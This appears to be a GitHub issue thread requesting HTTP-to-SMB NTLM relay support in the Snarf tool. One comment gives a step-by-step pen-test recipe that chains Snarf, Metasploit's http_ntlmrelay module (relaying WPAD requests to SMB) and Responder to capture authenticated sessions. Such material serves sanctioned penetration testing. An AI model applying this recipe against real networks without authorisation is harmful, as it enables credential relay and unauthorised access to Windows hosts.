Feature Request - Support NTLMSSP/HTTP

[mubix]

Would be nice be able to relay to HTTP sites

[purpleteam]

We've talked about (and I have a basic shell of PoC code) for snarfing HTTP connections where the first of a series of keep-alive requests are authenticated with NTLM or SPNEGO. This would allow you to tack on additional HTTP requests under that same authenticated context at least as long as the keep-alive lasts (not long on some web servers, alas). Is that what you mean?

Or do you mean turning inbound HTTP connections to outbound SMB?

Or do you mean turning inbound SMB connections to outbound HTTP?

[mubix]

So more and more using Responder I find I receive HTTP based NLTM auth more than SMB and it would be nice to be able to use that against an SMB server or another NTLM based web server.

[jephthai]

I have an update on this. We do still intend to build this in, but for now there is a way to accomplish this. Here's what I found worked on a recent pen-test:

• Run Snarf with a default IP (“-d” option) or a round robin list (“-f” option)
  • sudo node snarf.js –d
  • NOTE: you don’t have to change IP tables at all since this isn’t MitM
• Configure the metasploit http_ntlmrelay module to relay to the Snarf server with the “SMB_LS” RTYPE
  • set URIPATH /wpad.dat
  • set SRVHOST
  • set SRVPORT 80
  • set RHOST
  • set RPORT 445
  • set RTYPE SMB_LS
• Configure Responder to run with the HTTP server disabled
  • HTTP = Off
  • HTTPS = Off
• Sit back and watch sessions come in every time there’s a “wpad” request

[Lexus89]

This would be awesome, it is still under development?

[jephthai]

Actually, yes -- and I believe we have some HTTP->SMB cross-protocol code that isn't checked in. I'll check with Victor (offenseindepth) and see.

[Lexus89]

@jephthai Any update yet on the HTTP to SMB code?

[PowerPress]

Any news this would be awesome